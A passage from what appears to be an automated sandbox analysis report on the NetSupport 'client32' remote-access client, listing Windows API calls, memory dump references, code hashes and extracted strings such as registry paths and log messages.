                                                                                        • CreateSolidBrush.GDI32(?), ref: 11015936
                                                                                        • CreatePen.GDI32(00000000,00000002,?), ref: 11015950
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 1101595E
                                                                                        • SelectObject.GDI32(00000000,?), ref: 1101596E
                                                                                        • GetRgnBox.GDI32(00000000,?), ref: 1101597B
                                                                                        • OffsetRgn.GDI32(00000000,?,00000000), ref: 1101599A
                                                                                        • FillRgn.GDI32(00000000,00000000,?), ref: 110159A9
                                                                                        • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 110159BC
                                                                                        • DeleteObject.GDI32(00000000), ref: 110159C9
                                                                                        • SelectObject.GDI32(00000000,?), ref: 110159D3
                                                                                        • SelectObject.GDI32(00000000,?), ref: 110159DD
                                                                                        • DeleteObject.GDI32(?), ref: 110159E6
                                                                                        • DeleteObject.GDI32(?), ref: 110159EF
                                                                                        • DeleteObject.GDI32(?), ref: 110159F8
                                                                                        • SelectObject.GDI32(00000000,?), ref: 11015A02
                                                                                        • DeleteObject.GDI32(?), ref: 11015A0B
                                                                                        • SetBkMode.GDI32(00000000,?), ref: 11015A15
                                                                                        • EndPaint.USER32(?,?), ref: 11015A29
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3702029449-0
                                                                                        • Opcode ID: e7ca80d8907cc304a46d9070d682bdfbe178c52b0f9b8c57fa8b4971fc68b104
                                                                                        • Instruction ID: e7a7d0d35206815f70b1bb972d69f7a8e5722a3a2875c7dff22017cd80ac6707
                                                                                        • Opcode Fuzzy Hash: e7ca80d8907cc304a46d9070d682bdfbe178c52b0f9b8c57fa8b4971fc68b104
                                                                                        • Instruction Fuzzy Hash: 6F51FA75A41228AFDB14DBA4CD88FAEB7B9FF89304F004199E51997244DB74AE40CF61
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000004), ref: 1100385F
                                                                                        • InflateRect.USER32 ref: 1100387A
                                                                                        • GetSysColor.USER32(00000010), ref: 1100388D
                                                                                        • GetSysColor.USER32(00000010), ref: 110038A4
                                                                                        • GetSysColor.USER32(00000014), ref: 110038BB
                                                                                        • GetSysColor.USER32(00000014), ref: 110038D2
                                                                                        • GetSysColor.USER32(00000014), ref: 110038F5
                                                                                        • GetSysColor.USER32(00000014), ref: 1100390C
                                                                                        • GetSysColor.USER32(00000010), ref: 11003923
                                                                                        • GetSysColor.USER32(00000010), ref: 1100393A
                                                                                        • GetSysColor.USER32(00000004), ref: 11003951
                                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 11003958
                                                                                        • InflateRect.USER32 ref: 11003966
                                                                                        • GetSysColor.USER32(00000010), ref: 11003982
                                                                                        • CreatePen.GDI32(?,00000001,00000000), ref: 1100398B
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 11003999
                                                                                        • MoveToEx.GDI32(00000000,?,?,00000000), ref: 110039B2
                                                                                        • LineTo.GDI32(00000000,?,?), ref: 110039C6
                                                                                        • SelectObject.GDI32(00000000,?), ref: 110039D4
                                                                                        • DeleteObject.GDI32(?), ref: 110039DE
                                                                                        • GetSysColor.USER32(00000014), ref: 110039EC
                                                                                        • CreatePen.GDI32(?,00000001,00000000), ref: 110039F5
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 11003A02
                                                                                        • MoveToEx.GDI32(00000000,?,?,00000000), ref: 11003A1E
                                                                                        • LineTo.GDI32(00000000,?,?), ref: 11003A35
                                                                                        • SelectObject.GDI32(00000000,?), ref: 11003A43
                                                                                        • DeleteObject.GDI32(00000000), ref: 11003A4A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
                                                                                        • String ID:
                                                                                        • API String ID: 1903512896-0
                                                                                        • Opcode ID: 2cfe13d901323041af8979d0bf4f233a4973ef12df7ab060298465a19fe5eca5
                                                                                        • Instruction ID: aabe104b4c11b9f3e9ba86a19e2760383e051eecf234c5ca32d00541c09823f7
                                                                                        • Opcode Fuzzy Hash: 2cfe13d901323041af8979d0bf4f233a4973ef12df7ab060298465a19fe5eca5
                                                                                        • Instruction Fuzzy Hash: D18170B5900209AFEB14DFA4CC85EBFB7B9FF88704F104658F611A7681D770A941CBA0
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(psapi.dll), ref: 1110708D
                                                                                          • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,756F4977,00000000), ref: 11138283
                                                                                          • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                                          • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                                          • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                                          • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                                          • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
                                                                                        • FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
                                                                                        • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11107116
                                                                                        • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId,?,1110809F), ref: 111071A0
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses,?,1110809F), ref: 111071F1
                                                                                        • GetProcAddress.KERNEL32(?,ProcessIdToSessionId,?,1110809F), ref: 1110726A
                                                                                        • SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
                                                                                        • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
                                                                                        • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
                                                                                          • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026306
                                                                                          • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                          • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026336
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 11107446
                                                                                          • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
                                                                                        • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
                                                                                        • CloseHandle.KERNEL32(?), ref: 1110743F
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
                                                                                        • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
                                                                                        • API String ID: 348974188-2591373181
                                                                                        • Opcode ID: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
                                                                                        • Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
                                                                                        • Opcode Fuzzy Hash: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
                                                                                        • Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51
                                                                                        APIs
                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 110EF8FE
                                                                                        • GetStockObject.GDI32(0000000F), ref: 110EF912
                                                                                        • GetDC.USER32(00000000), ref: 110EF98A
                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 110EF99B
                                                                                        • RealizePalette.GDI32(00000000), ref: 110EF9A1
                                                                                        • GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110EF9BC
                                                                                        • SelectPalette.GDI32(00000000,?,00000001), ref: 110EF9D0
                                                                                        • RealizePalette.GDI32(00000000), ref: 110EF9D3
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 110EF9DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
                                                                                        • String ID:
                                                                                        • API String ID: 1969595663-0
                                                                                        • Opcode ID: bce5d3ccbce10ed5eefc93319fcdcff04fec20c36a24ddf07fe8ce088f884d40
                                                                                        • Instruction ID: e17b5be7c9f279923d338761c599270f53c35d08167a1dd70bb196578b399fb7
                                                                                        • Opcode Fuzzy Hash: bce5d3ccbce10ed5eefc93319fcdcff04fec20c36a24ddf07fe8ce088f884d40
                                                                                        • Instruction Fuzzy Hash: 3471B2B2E41228AFDB04CFE5CC88BEEB7B9FF48705F044129F515E7244D674A9408BA1
                                                                                        APIs
                                                                                        • OpenFileMappingA.KERNEL32 ref: 1105D277
                                                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
                                                                                        • GetDC.USER32(00000000), ref: 1105D2BB
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
                                                                                        • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 1105D300
                                                                                        • GetTickCount.KERNEL32 ref: 1105D30F
                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
                                                                                        • GetTickCount.KERNEL32 ref: 1105D33C
                                                                                        • GetLastError.KERNEL32(?), ref: 1105D348
                                                                                        • GdiFlush.GDI32 ref: 1105D35C
                                                                                        • SelectObject.GDI32(00000000,?), ref: 1105D367
                                                                                        • DeleteObject.GDI32(00000000), ref: 1105D36E
                                                                                        • DeleteDC.GDI32(00000000), ref: 1105D378
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 1105D384
                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1105D396
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
                                                                                        • String ID: /thumb:$Error %d blitting from winlogon, took %d ms$ThumbWL
                                                                                        • API String ID: 652520247-4094952007
                                                                                        • Opcode ID: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                                        • Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
                                                                                        • Opcode Fuzzy Hash: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                                        • Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1
                                                                                        APIs
                                                                                          • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?), ref: 110ED53C
                                                                                          • Part of subcall function 110CFE80: _malloc.LIBCMT ref: 110CFE9A
                                                                                          • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32 ref: 110ED1CB
                                                                                        • wsprintfA.USER32 ref: 1102B84D
                                                                                          • Part of subcall function 110ED8F0: RegQueryInfoKeyA.ADVAPI32 ref: 110ED926
                                                                                        • FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1102B65A
                                                                                        • wsprintfA.USER32 ref: 1102B69E
                                                                                        • wsprintfA.USER32 ref: 1102B705
                                                                                          • Part of subcall function 110EDF70: wsprintfA.USER32 ref: 110EDFD4
                                                                                          • Part of subcall function 110EDF70: _malloc.LIBCMT ref: 110EE053
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
                                                                                        • String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$set %s=15, e=%d
                                                                                        • API String ID: 2153351953-120756110
                                                                                        • Opcode ID: 16ea69e6aed828567fb58803387b960e2f84e8ff47cc7e9f30f766e1ef55425b
                                                                                        • Instruction ID: 3d8c04e41a601bc5ed25e478ecb801087f545ab88011abf8f54d42b1378c6c4c
                                                                                        • Opcode Fuzzy Hash: 16ea69e6aed828567fb58803387b960e2f84e8ff47cc7e9f30f766e1ef55425b
                                                                                        • Instruction Fuzzy Hash: CEB17075D0122AAFDB24DB55CD98FEDB7B8EF05308F4041D9E91962280EB346E88CF61
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 1105F890
                                                                                        • wsprintfA.USER32 ref: 1105F8A4
                                                                                        • wsprintfA.USER32 ref: 1105F8FF
                                                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,00000000,?,80000002,?,00020019), ref: 1105F97F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$EnvironmentExpandStrings
                                                                                        • String ID: %sUseHKLM$%s\%s$ConfigList$General\ProductId$HKCU$HKLM$NSM$NSS$NetSupport School$NetSupport School Pro$Software\NetSupport Ltd$Software\Productive Computer Insight$\
                                                                                        • API String ID: 2608976442-3241390832
                                                                                        • Opcode ID: ecdd20f2323e681a36014c6c58700e4024b6c0ee02548503430c58d0ba2d7c2c
                                                                                        • Instruction ID: e96a2cbbb3b754be6409a963181338f47424fc131a1cec65b85ff3420bffa3c7
                                                                                        • Opcode Fuzzy Hash: ecdd20f2323e681a36014c6c58700e4024b6c0ee02548503430c58d0ba2d7c2c
                                                                                        • Instruction Fuzzy Hash: 89D1C375D0126EAEDB61DB64DD54BDEB7B8AF19309F0000D8D909A3181FB746B84CFA2
                                                                                        APIs
                                                                                        • SystemParametersInfoA.USER32(00000010,00000000,111F1A18,00000000), ref: 1113B6F2
                                                                                        • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 1113B705
                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,00000010,00000000,00000000,00000000), ref: 1113B89D
                                                                                        • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1113B8B3
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1113B8FB
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 1113BA43
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$CloseDirectoryFolderHandlePathWindows__wcstoi64
                                                                                        • String ID: Client$PrefixName$RecordAudio$ReplayFiles$ReplayPath$Show$ShowRecord$ShowToWindow$UI: End Show$UI: Start Show$\Desktop
                                                                                        • API String ID: 3054845645-718119679
                                                                                        • Opcode ID: cad26973e156c2776a079135ce5d729a52d5268c4a26378e177e48f36ebaf952
                                                                                        • Instruction ID: 97c658d0ff47ffb6e0b086364488060456d2f78afd94873c83fd0d8ea8d00dc5
                                                                                        • Opcode Fuzzy Hash: cad26973e156c2776a079135ce5d729a52d5268c4a26378e177e48f36ebaf952
                                                                                        • Instruction Fuzzy Hash: 9DB15A74B41625AFE316DBA0CD91FE9FB61FB84B19F004129FA15AB2C8E770B840C795
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • wsprintfA.USER32 ref: 110EB5D8
                                                                                        • GetTickCount.KERNEL32(_debug,TracePlugins,00000000,00000000,?,?,00000000), ref: 110EB632
                                                                                        • SendMessageA.USER32(?,0000004A,?,?,?,00000000), ref: 110EB646
